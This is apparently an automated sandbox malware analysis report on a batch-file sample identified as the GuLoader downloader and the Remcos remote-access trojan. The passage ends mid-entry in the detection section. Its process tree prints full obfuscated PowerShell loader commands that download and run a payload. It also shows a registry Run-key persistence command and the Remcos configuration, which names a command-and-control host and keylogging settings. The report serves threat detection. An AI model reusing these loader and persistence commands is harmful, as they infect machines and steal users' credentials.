Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rIMGTR657365756.bat

Overview

General Information

Sample name:rIMGTR657365756.bat
Analysis ID:1536035
MD5:97f6fcabf941e9e4eb8caaf89cb7c733
SHA1:0aa53ac7dc50e7a16b9ba92024ecd3b141e1aecf
SHA256:ff6c4c8d899df66b551c84124e73c1f3ffa04a4d348940f983cf73b2709895d3
Tags:batuser-Porcupine
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Copy From or To System Directory
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 2928 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rIMGTR657365756.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5576 cmdline: powershell.exe -windowstyle hidden " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN nck IndeVensvLodsaPapin HjkdpsycsSpivfoffsoF rtrTerrsTortyPocknDemai,yttnthamg rodespu,rSter]Syll=ejer$ Br FobskuExporHon.cHypoa Nont.opieSyn d SedrOverr SneeTo.lfInterT esa.oldg lua FlabInteiPilklTareiAlt.tMis,y ogl ');$Gasartens60=Taborets 'Unfo$.luerFj leHimygSlvleGoallJe,nmaftesCrtosbilli Co gVulcsForlt Mad. TheDA tioKerawUdfrnFodblmi roSemiaYuked ,ycFUndeiBro lA.ioeV ks(Prin$Col ESci.n Klag D,ml eaneEs es DiskStena armrHklee gaarHidss Ace, Chi$ UpbUAcc dAquebBraclDephi fbkAr esRein) ald ';$Udbliks=$Thioneine;Politiseres (Taborets 'Reun$CampgSul.lSpitoCrabbPriva ExflMala:manuaDom,c RaahLus,r ,riOB,thMAntiA.eksT gotiKontNInvii HorcZo t= nc( kh,T ,tyeS leSQuattVa v-GldsPBrazaSkostfilthTran Bee$granUfacsdKokoBAlinl RafIE ickNot sSamm)Su a ');while (!$Achromatinic) {Politiseres (Taborets 'Meak$Kom gKalil ScroRemubYowla PrelGuar:BekrgR warF ise ForiEnd.t geo= Bun$WhamtCaferSolou anese v ') ;Politiseres $Gasartens60;Politiseres (Taborets 'QuivSKom tJohaA eflRDislTS nd-PrehsFoppLBarneQueseM,nipPama Reme4A ha ');Politiseres (Taborets 'Sand$ Ro Gkyp LCopro MatBHjlpA AnrLS dd:SynaAS,ilCResoh Na R L,sORakeMBen ABol t,lipIRe.anFjorI ubCbut,=.nch(En.lTCa.tETohesMel TMacr-DeplPShanAT,glT SnaHReup lu.k$SladuSprrd Samb,ammlMicrIF,enkFlusSRamp) ua ') ;Politiseres (Taborets 'A,sk$MomogDisal E ko DiaB BerANontL nge:agriiSkiemRethpCh llTi.beTur MFibrE MorNRegnTMuceaSadltKolliChroo AsyNEa lAmnstLLode= Sna$ VelGUndelDr tOBoonbIngeAIroklLy o:Snorn edtoP ckT Ga a TeltS.orE Afvs Ras+ dup+ cho%Fire$S arS KarARouttek ke rctLNo slKrybIAltsT,itabSardYeftee Af rIdeoNBjrne arpsTolv.OpsaCPi tOTok.USkamnIrreTPant ') ;$Engleskarers=$Satellitbyernes[$implementational];}$Budgettets=309680;$minification=29934;Politiseres (Taborets 'P el$ vergStuelChaeoMolabChr a utuLUsag:Semim ngeMilikP raA Sl N Ba IUnprK ritk SlueD gerBeclnK,ivEUngrsPa k Mou=Fed GratGMisoE udat Rus-ophtcUf eO ReanBaskTFilteVaquNHaentSved A fr$a rjuSa vdAtrib edeLEmbrIDummKBellS iva ');Politiseres (Taborets 'Togp$AfgigSt,klL kroF eebBillaDis l Not: erpAPodorAksecTrish uffaTypoe Bu oBa,dlPhen Afre= ska Re.u[Ba oSLgkuyindlsflurtSproeIntrmTr,n.TresCLegaoNifenMacuv etueSeksrIrontOutr]San :With:KonsFAirprResboTa km SciBRetraSpeasTy keim o6 Rst4ValuSAfsttNglerAdeliApnenNon g unk(Stre$U stmStane.rfakCerva ilbnSelviP aekSk ak ozee,cotrCentn BeveAftosSign) F.l ');Politiseres (Taborets ',ome$Zulkg T,klBi eoFdevBNds aUndeLFors:Dic.mP,edODe oR InctWedgAn,tuLombyWImpeIPredSUnfaE Re 1 Sub3Bilt3Anac sy b=Kloe Yeg [Pries AttyYellSBilltPhipeCarlm rat. ndeTS ane StaxHuskTProd.H,neESkulNPernCskaloCh iDExcrIS.mlnBeg.G.tje]Disl:perf:SyriA TenS eucc AriiPrgtiSpkh.Spu.GVa aeCabrT,iscs Am tNo pREv kIIschNP upg Fli( Fle$CeleAR.mor DiecDiplH othAUndeECa lOAndeLTele)A ch ');Politiseres (Taborets ',und$ KargJordl vaboEnsuBCahoaLastl Ima:HospCKd jOTracM Ch pSteaUIndet T,nEStalreg.sdmodvrSkifESiniV VokEUnimt Fol=A va$ ,enm T rO nscRSeksTNotiA stalF,stWDiptIFinhsAp ke ov1R od3U ha3 ies.BoetsMercuFinebP tasAndet KarR Lb ISk,dnUndeGKloe(Infr$ Fo b ProuleftdsmakGOvereB sttIdxlt N re ra,t Sn SA,fo,Cher$G,unmPhleI ovenBy liEl kFPr.fiUr gC.pacAScrutSoldi TiloThinNAfte)Fo r ');Politiseres $computerdrevet;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6388 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Buttresslike Egenskabsvinduets Whirlmagee sunkne Tangibilities Skivgatterne Unpeacefully #>;$hypogeal='Byggemodnedes';<#grasping Pedestrianising Kardon #>;$Untroubledly=$Telegrammes+$host.UI;function Taborets($Boejer){If ($Untroubledly) {$Baljers++;}$Sirenize=$Abintestate+$Boejer.'Length'-$Baljers; for( $Furcated=4;$Furcated -lt $Sirenize;$Furcated+=5){$preidentification++;$Nedlgger+=$Boejer[$Furcated];$Fruehauf='Kludging';}$Nedlgger;}function Politiseres($Antiopelmous){ & ($Glassine) ($Antiopelmous);}$Furcatedrrefragability=Taborets 'UnmoM sphoLarrzEksai Udal knlBloda und/Magn ';$Furcatedrrefragability+=Taborets 'Besv5Tr c.gran0jam util(StroWSkadiskannHattd owloUrdswBu ssTils GrunNV,siTlan, Kand1Aftn0Zith. Bop0Turb;Over IntW TraiTougnE te6Temp4Aarg;e nf n ggxGalo6Lian4Roeg;Lol Drecr Resv Bi :Pent1Rose3 Ext1 kod. C f0Arma)H ma SubfGsulfeMinucStank BedoE sp/ S.a2E,he0 mac1Tilf0Pine0Bogt1Pent0 Til1Te e AfsF orki FrerGrafeKl sfI deoka mxUngd/Clod1Lady3.zil1Omri.o sm0Misk ';$Drikkevandsforsyninger=Taborets 'CamaublgeSCe teCahir P a-TeleAParegKomse OpsNTj,ntCent ';$Engleskarers=Taborets 'une hTurat yeltSnohpkinesd.li:hexa/Lagd/ PhlmLipai rneoUnovtSupetKil oRoupeTri,zDos,a orun TrieForblCec lR,deaFdni. HencLa.roRemamSter/SpurH HjeoFindv DoleMoridThervEm artradkconse TaatNeds.Renlr ruaM ltrSpor ';$Genhret=Taborets ' ppe>Emer ';$Glassine=Taborets 'AarsI Ci,EPri.XKard ';$Balsameredes='Mangfoldigste';$Lizbeth='\aspargessuppens.Bri';Politiseres (Taborets ' Su,$KaragMareLBuboo FunbChoraKastlGray: PaltDeniHEmboIHypeO DvrNStilEF,avI ogpnGrame Pol= Su $ ForE GonNHjervBleg: GarA I opDisrpUnprDWho.ASt rTBl kA,krm+Inc $Na klFo,kiTan ZBattbRe.reArkatNdudhRavi ');Politiseres (Taborets 'alko$Se vGHaemLLuftOOralB RopaN melOpda:UncoS S.laA,latFlosE obsLCacqL lunI Ci t uthB RedyUnseEClosRBrauNTeksede rSNrin=Shr $RedbEopgrnT,buGPrivLSu aeS mvS HalkKabaa VenrS teeB nkRSte.s,pip.StndSForsP hrelHjeri undTHulk(Haar$Surag somE alfNRavgHCinnRC nte ogtBrne)Hand ');Politiseres (Taborets ' Ove[StriNAnkeePersTKono.LillS StaEeksprs nhvInkpiSygeCInv E epap.urfOSubtI,nianJahvtPse.mUnexaThe NTelea alGArgue PlaRErgo]Sate:Dist: limS.asteGydeCCoppU enRFa iiTildTSkr Y astp Enfr NedOd mptRipeO indCNon,oAutolAvne G.aa=Nona Regr[RefeNHypeEStraTgly .Ta.lsBnkbE Pr.C S eUc,mprTamuiAnthtEnciYStrap F.nr uzOSekst IsooMvreCH anOAbefLIsocTnis,YCyanpRetteL,mi]S ir:Nonc: IndTHvirL NedSMoon1Pleb2D nk ');$Engleskarers=$Satellitbyernes[0];$Faglrereksaminernes=(Taborets 'Koll$LejngMo oL KetoPlatb KreaWatelH dr:Oretr MedEBedyG To eInteLSperMVelusNonss Blii InsgDatasChecTO on=UnquNCowaeGelaWClay-TopfO ,rob BijJ areERareCKraktHiml SheeSCa iyexanScoupTJollePylrmDeko.T leN rase .igtChin.seglWforhe nneb ydrCUrfjlDil IUbndE aponKvilTKalv ');Politiseres ($Faglrereksaminernes);Politiseres (Taborets 'D lt$Fnisr Mile Vi,gParteSpaal m,dm LepsDiffs taiForlg onfsCarrtSkjt. UndH.take LnnaDan dPerfePapfrDeorsLerr[Adv $Tes,DVaesr rotiSvovkN nck IndeVensvLodsaPapin HjkdpsycsSpivfoffsoF rtrTerrsTortyPocknDemai,yttnthamg rodespu,rSter]Syll=ejer$ Br FobskuExporHon.cHypoa Nont.opieSyn d SedrOverr SneeTo.lfInterT esa.oldg lua FlabInteiPilklTareiAlt.tMis,y ogl ');$Gasartens60=Taborets 'Unfo$.luerFj leHimygSlvleGoallJe,nmaftesCrtosbilli Co gVulcsForlt Mad. TheDA tioKerawUdfrnFodblmi roSemiaYuked ,ycFUndeiBro lA.ioeV ks(Prin$Col ESci.n Klag D,ml eaneEs es DiskStena armrHklee gaarHidss Ace, Chi$ UpbUAcc dAquebBraclDephi fbkAr esRein) ald ';$Udbliks=$Thioneine;Politiseres (Taborets 'Reun$CampgSul.lSpitoCrabbPriva ExflMala:manuaDom,c RaahLus,r ,riOB,thMAntiA.eksT gotiKontNInvii HorcZo t= nc( kh,T ,tyeS leSQuattVa v-GldsPBrazaSkostfilthTran Bee$granUfacsdKokoBAlinl RafIE ickNot sSamm)Su a ');while (!$Achromatinic) {Politiseres (Taborets 'Meak$Kom gKalil ScroRemubYowla PrelGuar:BekrgR warF ise ForiEnd.t geo= Bun$WhamtCaferSolou anese v ') ;Politiseres $Gasartens60;Politiseres (Taborets 'QuivSKom tJohaA eflRDislTS nd-PrehsFoppLBarneQueseM,nipPama Reme4A ha ');Politiseres (Taborets 'Sand$ Ro Gkyp LCopro MatBHjlpA AnrLS dd:SynaAS,ilCResoh Na R L,sORakeMBen ABol t,lipIRe.anFjorI ubCbut,=.nch(En.lTCa.tETohesMel TMacr-DeplPShanAT,glT SnaHReup lu.k$SladuSprrd Samb,ammlMicrIF,enkFlusSRamp) ua ') ;Politiseres (Taborets 'A,sk$MomogDisal E ko DiaB BerANontL nge:agriiSkiemRethpCh llTi.beTur MFibrE MorNRegnTMuceaSadltKolliChroo AsyNEa lAmnstLLode= Sna$ VelGUndelDr tOBoonbIngeAIroklLy o:Snorn edtoP ckT Ga a TeltS.orE Afvs Ras+ dup+ cho%Fire$S arS KarARouttek ke rctLNo slKrybIAltsT,itabSardYeftee Af rIdeoNBjrne arpsTolv.OpsaCPi tOTok.USkamnIrreTPant ') ;$Engleskarers=$Satellitbyernes[$implementational];}$Budgettets=309680;$minification=29934;Politiseres (Taborets 'P el$ vergStuelChaeoMolabChr a utuLUsag:Semim ngeMilikP raA Sl N Ba IUnprK ritk SlueD gerBeclnK,ivEUngrsPa k Mou=Fed GratGMisoE udat Rus-ophtcUf eO ReanBaskTFilteVaquNHaentSved A fr$a rjuSa vdAtrib edeLEmbrIDummKBellS iva ');Politiseres (Taborets 'Togp$AfgigSt,klL kroF eebBillaDis l Not: erpAPodorAksecTrish uffaTypoe Bu oBa,dlPhen Afre= ska Re.u[Ba oSLgkuyindlsflurtSproeIntrmTr,n.TresCLegaoNifenMacuv etueSeksrIrontOutr]San :With:KonsFAirprResboTa km SciBRetraSpeasTy keim o6 Rst4ValuSAfsttNglerAdeliApnenNon g unk(Stre$U stmStane.rfakCerva ilbnSelviP aekSk ak ozee,cotrCentn BeveAftosSign) F.l ');Politiseres (Taborets ',ome$Zulkg T,klBi eoFdevBNds aUndeLFors:Dic.mP,edODe oR InctWedgAn,tuLombyWImpeIPredSUnfaE Re 1 Sub3Bilt3Anac sy b=Kloe Yeg [Pries AttyYellSBilltPhipeCarlm rat. ndeTS ane StaxHuskTProd.H,neESkulNPernCskaloCh iDExcrIS.mlnBeg.G.tje]Disl:perf:SyriA TenS eucc AriiPrgtiSpkh.Spu.GVa aeCabrT,iscs Am tNo pREv kIIschNP upg Fli( Fle$CeleAR.mor DiecDiplH othAUndeECa lOAndeLTele)A ch ');Politiseres (Taborets ',und$ KargJordl vaboEnsuBCahoaLastl Ima:HospCKd jOTracM Ch pSteaUIndet T,nEStalreg.sdmodvrSkifESiniV VokEUnimt Fol=A va$ ,enm T rO nscRSeksTNotiA stalF,stWDiptIFinhsAp ke ov1R od3U ha3 ies.BoetsMercuFinebP tasAndet KarR Lb ISk,dnUndeGKloe(Infr$ Fo b ProuleftdsmakGOvereB sttIdxlt N re ra,t Sn SA,fo,Cher$G,unmPhleI ovenBy liEl kFPr.fiUr gC.pacAScrutSoldi TiloThinNAfte)Fo r ');Politiseres $computerdrevet;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 1276 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 1292 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 2992 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • msiexec.exe (PID: 6416 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\qalgwws" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6120 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\avqzpodslp" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 7108 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 5740 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • msiexec.exe (PID: 6476 cmdline: C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kxvkpyvlhxpkj" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["pelele.duckdns.org:51525:1"], "Assigned name": "MISS Chy", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-TXCR8B", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000008.00000002.4525154442.000000002253E000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000008.00000002.4525112746.00000000224FD000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000008.00000002.4512385168.0000000006B0E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000008.00000002.4512385168.0000000006B40000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000005.00000002.2380669297.0000000008A80000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 10 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_5576.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_6388.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xc44e:$b2: ::FromBase64String(
                • 0xb4b9:$s1: -join
                • 0x12ad6:$s3: Reverse
                • 0x4c65:$s4: +=
                • 0x4d27:$s4: +=
                • 0x8f4e:$s4: +=
                • 0xb06b:$s4: +=
                • 0xb355:$s4: +=
                • 0xb49b:$s4: +=
                • 0x15313:$s4: +=
                • 0x15393:$s4: +=
                • 0x15459:$s4: +=
                • 0x154d9:$s4: +=
                • 0x156af:$s4: +=
                • 0x15733:$s4: +=
                • 0xbcf6:$e4: Get-WmiObject
                • 0xbee5:$e4: Get-Process
                • 0xbf3d:$e4: Start-Process
                • 0x15faa:$e4: Get-Process

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: CurrentVersion Autorun Keys Modification
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Aversi
                Sigma detected: Direct Autorun Keys Modification
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1292, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)", ProcessId: 2992, ProcessName: reg.exe
                Sigma detected: Msiexec Initiated Connection
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.56.189, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1276, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49797
                Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Aversi" /t REG_EXPAND_SZ /d "%Afgrnsningsproblemer% -windowstyle 1 $Predestinationism=(gp -Path 'HKCU:\Software\hovedparts\').Bagateller;%Afgrnsningsproblemer% ($Predestinationism)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1276, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD 